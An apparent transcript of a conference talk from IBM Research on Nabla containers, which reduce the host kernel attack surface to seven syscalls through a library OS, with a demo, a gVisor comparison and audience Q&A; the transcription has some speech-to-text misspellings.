 Hi, my name is Brandon. I'm from IBM Research from the container cloud team. And I'm going to present to you something that we are working on. We call it NAV Black Containers. So this is the NAV Black Containers logo. If you are wondering, the reason we chose this is because it kind of resembles the architecture that you see later. So the conventional wisdom today is that people don't believe containers are secure. They would run multi-tendency with virtual machines, but they don't want to do the same with containers. So in research, we thought about this a little bit. And we wanted to dive a little deeper to say why do people have this mindset about containers versus VMs? So how exactly do we want to define isolation, compare this metric against both VMs and containers? And after we figure out what makes people think mix workloads isolated, figure out how to have this isolation be put into containers as well. So I'm going to go through just a really quick introduction to what our trend model is for isolation. And then I'll go through a short demo about our open source runtime run-n-t. That runs NAV Black Containers. All right. So how we define isolation is that a workload should not be able to access the data or secrets of a co-located workload or container on the same host. So a quick example is we have service A over here, and service A has a secret or some data. An attacker that runs another container on the same host should not be able to access that secret. So why is this important? So for us, one of the use cases is, for example, if I have service A over here that has gone through VHX, has gone through a lot of audit, it's a really secure service. But I have a legacy 30-year-old application that has tons of vulnerabilities. An attacker may do a horizontal attack on the same host. So why does container isolation right now? So containers are namespace processes. So namespacing is good because by definition, it means that the data of one container should not be able to be retrieved from another process. But because containers are namespace processes, this means that they are also processes. And so any vulnerabilities or exploits that apply to regular Linux processes would most likely apply to containers as well. So the real main threat that we are trying to address here is this, what we call the horizontal attack profile, which is two containers on the same host going through an attack through the shared privilege component, which is the kernel in our case. So to see what we're up against, let's take a look at a really brief exploits guide. So this was Duddy Cowell CVE that was in 2016. Was quite a popular one. And so what happened was basically this exploit revolved around a race condition in one of the systems. And so what it did was it basically MF the page, create a thread that kept running M-advisors and they had another thread that read and write and wrote out of the profile system. And what they're trying to do is exercising multiple functions to trigger the race condition. So to understand how we are measuring isolation, let's take a deeper view of what the kernel looks like. So the kernel to us is just a bunch of functions, right? Kernel is just code. And so how we are modeling it is that what we saw the exploit doing was it was exercising system calls to exercise the kernel code within the kernel, right? So in this case, we have the application on top. So everything outside the green box is user space. And we have the system call, which is interfacing to the kernel. And how we're modeling this is every box we have over here you can think about it as a kernel function. And we can think about out of all the kernel functions within the kernel, there would be some functions that may have vulnerabilities. And we mark these as the red boxes, right? So the hypothesis that we went with is that if we restrict the top level amount of system calls that interface into kernel, we can restrict the number of kernel functions reachable. And hopefully we prevent some of the red boxes from being reachable. So we have less vulnerabilities and therefore potentially less exploits. So great, so this has been done, right? Everyone knows SACCOM. So Docker has a default SACCOM policy. I believe it blocks at least 44 of the system calls. And what this is doing is it's doing exactly what we're thinking of, right? What it's doing is it's preventing access to certain kernel functions. So if we kind of treat the boxes that are grayed out as kernel functions that are no longer reachable, we can kind of see this as, you know, they are basically removed from the kernel itself. So the issue with SACCOM policies is it's often difficult to create a generic SACCOM policy, but still be, and be secure. So this is one of the problems. There's another approach of this, which has been Cisco profiling. So this is done by several companies like Aqua, Twislog. And what they're doing is they're running a bunch of tests or running the container multiple times to find the SACCOM profile that they can use. So our approach is something called NABLA. So what we are providing is a deterministic and generic SACCOM policy for applications that limits to only seven system calls. And how we're doing this is with library or a technique. So the general gist of it is that we are taking a lot of the functionality in the kernel. So for example, the TCP IP stack and we are bringing it up into user space. So example of this, which I mentioned, the TCP IP stack. In the TCP IP stack, there's a lot of code, but a lot of the code is, you know, implementing sliding windows, implementing, you know, where should my packet go and things like that. You don't have to run this code in the kernel a lot. There's no reason to. Maybe besides performance reasons. But so the question is, you know, can we lift this up into user space? And that's exactly what we're doing. We're taking the TCP stack, some parts of the file system, and we are bringing that in up into a library operating system here. So we can think about this as, we're taking all the functionality and we're sticking it in a Lipsy so that all the functions are done within the user space. And only when you have to talk to the kernel, you have to write a packet or something, then we perform a track. So that's what the seven syscalls are mainly doing. So the approach here is kind of, you know, we are using these concepts for unit kernels and eventually how we see the kernel is going to become like a microkernel. It's going to be smaller and smaller. So we've done this, I mentioned unit kernels already. All this is based on things from Rumpron and Solify, which are from the unit kernel community. There is a talk on this in the microkernel track. If you can go back in time like an hour and go to the microkernel track, it's there. If not, we have a paper on this. And so the main gist of it is we will take the unit kernels and we had this thing called the Solify interface, which looked kind of like a VM interface. And what we were able to do is we were able to run the interface as a process with only seven syscalls. And what this meant was that, first we don't have to use virtualize it, we don't have to use VT, and we get a lot of performance increases because we don't have the additional layer. So memory density performance is increased by a lot. So what we've done is the modifications to be able to run this. So we have a runtime called run-n-t. So what it is is an OCI runtime, which is on this level. So it's a replacement for run-t. The only difference is that the Navla binaries are not traditional, not traditional native binaries. They have special requirements. So what we have now is a custom build process because we are statically linking against our library operating system. So right now we have the application and we rebuild it with this library operating system. However, right now everything is statically linked and we believe that it is possible to eventually decouple that into the dynamic library. So in this way, we may not even have to recompile the binary. All right, I'm gonna do a quick demo to show kind of what's inside a Navla binary as well as running it with Docker. So we have this repository here, we call it Navla demo apps. And it contains a bunch of different applications that we have built. So if we take a look at one of them, this one is a node-express one, right? So we have two Docker files here. One is Docker file legacy and one is Docker file Navla. They are to build the two different type of containers. And that's before we get to building let's look at what the app is actually like. So it's your standard Node.js very simple application. You know, you have your app.js and the package.json and basically your standard Node.js application. And if we look at, for example, this is the original Docker file. So how you build a regular container. So pretty straightforward, copy the application files in and do a NPM install, right? So now we're going to take a look at what is in the Docker file for a Navla container. So because we do the rebuilding, there is an additional step. We have the step that we're using a separate binary. So what we have is pretty much the same thing. We are creating a node application, the NPM install. But instead we are using this base image which is called Navla node base. And this base image is just a empty image with just the node binary, the Navla node binary in it, right? So the takeaway from the differences of the Docker file is if you look at the file system as a whole, it's going to be exactly the same except the binary in the different file systems will be different. So I'm going to just build it really quickly. So what we're going to do next is we're going to look at the syscall interface and how it interfaces with the kernel. So we're going to start with the regular container. So we run a node express, like I see. So we have the, we're going to get the IP and the PID. And so what we're going to do now is we're going to ask trace this process and we're going to do a bunch of calls on this. All right, so after all those calls, we can take a look at what is the second, well, what would be at least the minimum second profile that will be needed for regular node application, right? So within the past 20 seconds, these are all the system calls that has been happy made by the node application. So what we are really interested here is not so much the number of syscall but the length of the list, right? If an attacker is able to compromise the service, he would be able to call these in any way, right? So if we look over here, we have M-Map, we have M-Advice and we have Read and Open. So it's pretty much if you exported a node.js application like this with the strictest sitcom policy, well not the strictest, but a reasonable sitcom policy, then you would still be able to perform something like the decal deck. So I'm going to now do this with the NABLA container. So I'm just going to add this additional argument, runtime, run and see, and we're going to have nodeexpress NABLA, all right. So now it's running the same application but our initialization code, we are printing a bunch of statements but basically you can see like the components here are part of the unicano ecosystem that we're using. So we're using the solo5 interface and we're having a run-prone, which is a NetBSD kernel with it, which is our library operating system. So we're going to do the same thing with the NABLA container, all right. And we see that it only used three out of seven syscalls. Basically it's just waiting on a socket and reading and writing packets whenever it has to. All that TCP stack, everything else is all done in the user space. All right, so just really quickly, what we saw is where the s-trace places, so what we saw was the syscalls interface going into the kernel. And so the graph on the left actually shows a comparison with regular Docker containers in red and the blue ones are NABLA. So we ran this for Node Express, Redis, and Python Tornado. And so that's kind of like a really high level view on it. What we did was we went a little deeper. So what we did was we were measuring the actual kernel functions using the s-trace utility. And what we saw was a similar trend. So the second graph over here on the right actually shows the difference in the s-trace measurements. So I'm just gonna touch on this really quick and so we can get to question. So something we noticed when we were running experiments is for certain measurements, we saw that NABLA was actually doing a little better than some virtualization technologies. And so we asked ourselves this question, like, have we achieved something here? And so we wrote a paper about this. I won't go too much detail into this because it's top on its own, but you can read the paper. Basically, the point, the contribution that we are making over here is that really you're gaining isolation from the interface, the width of the interface, and the implementation of what's underneath rather than using virtual VT itself. So we kind of said that these are two different ideas and they can be separated instead of coupled together all the time. So this is still a fairly new project and so we have multiple projects as run and see which is actual OCI runtime itself. We have NABLA demo apps which where you can do like new different applications, different languages and all that. And there's also run part and solo file which is really the meat of the unicorn level. Yeah, so we also want to get some feedback on like what other people think about the metric, you know, are there any other ideas about how do we measure isolation? This obviously isn't the one way to measure isolation because you have things like, spectacular meltdown, these are not accounted for in the metric. So there's still a lot of exploration there we have to do. If not, this is the end of my talk. Thank you very much. Thanks for the talk. Can you comment on the different approach with regards to GVISOR from Google? Yes, so we actually wrote a blog post about this. But the, I'm just gonna show you a picture just to kind of, okay. So the approach that GVISOR takes is kind of, wait, let's see, that's a side-by-side picture, okay. So this picture kind of summarizes GVISOR and NAVLA side-by-side. So GVISOR takes, part of the GVISOR philosophy is that there is a level of guarding between the process itself and the library OS, and you have another level of guarding between the library OS and the kernel itself. In the NAVLA approach, what we're saying is the process and the library operating system currently coupled together as one, and what we focus on is really securing this interface. There's nothing to say that we can't do what GVISOR is doing, but our main focus is basically making this interface as small as possible. We have measurements on the GVISOR stuff or so that I can show, but I think you can see that from the slides. I think it's a lot clearer. And yeah, feel free to look at this blog. It's a NAVLA containers blog. We have a bunch of information about the GVISOR stuff as well as the kernel containers analysis. Any other questions? In order to remove the necessity to rebuild the binaries, would mounting, would injecting the library using LDP load and removing the standard C library, would it kind of work once you still have the C-Score filtering? So the library was dynamically loaded. I think you could do it as long as you you have control over the first, the first like what the loader at least. If you had the loader and then you did, you basically hijacked the start command. I think that would be okay. So there's also another thing, which is currently our library operating system uses a NetBSC library operating system. So for Linux compatibility, either we need a additional layer that does translation or we need to use something like LKL, which is a Linux library operating system. But like what you said, once you have it as a dynamic library, I think LDP load is pretty much, we can do that. Actually I can answer this question because I was contributing to a project that does exactly that. Adding some modifying library calls using LDP load. The project is Scratchbox 2, that is used by Merrproject and Selfish OS to build, to emulate cross compiling. Without making impression of the process that it's not cross compiling. But the problem with this approach is that it's very fragile. If you have JLPC, it has tons of library functions and you need to replace all of them. Because it doesn't have a system call interface in separate library. So if you replace open, for example, you have to replace F open, P open and stuff like that. So it leads to very fragile. So Scratchbox 2 works, but there are still many, many different problems with this approach. If we had system calls separated in a separate library from JLPC, it would be much simpler, but it's not the case. Yeah, so we actually, we did an experiment where we only wanted to move the TCP IP stack. And that gave us problems because that depends on a different part of the kernel and then now we have to expose more things, right? So that's, I think that's kind of similar to the issue you're talking about. For our case, what we're doing is we are, we are forcing our Lipsy onto the application. So in that sense, we are assuming that all system calls go through our library operating system. So in that case, it's a bit more relaxed for us. Yeah, I think we have one question. Yeah, yeah. So are these NABLA biners special type of binary? Can we only run them inside these containers with your runtime? Or can we like run it on the host to us for some divine or whatever purposes? Right now it runs on, so there's this part of, so okay, let me just show you a picture. So this is actually what the NABLA binary took in the middle. So this is thing called solo five, which is a interface that originally was for Unicornos. Well, it still is. And what they have below that is the tenders, so this can run on multiple things. And so solo five actually has multiple options for the backend tenders. So you can run this on KBM as well. So you can also run this as like Unicornos as a service on VMs. Hi, thanks for your talk. I have a question. How do you like avoid calling M-MAP if applications request your memory? So yeah. So right now, so the interface is very VM-like. So right now what happens is when we allocate, so in Run-C we get the memory requirement. Run-N-C we get the memory requirement and basically we say, we're gonna create a Unicornos with this much space. So we give the chunk of memory to the Unicornos and it does its own memory allocation within itself. So there is still, we kind of take advantage of the idea that if you specify a big amount of memory, it's not gonna be used, it's gonna overcome it anyway. Yeah. Time for one more question. No, that's it. Thank you. Thanks.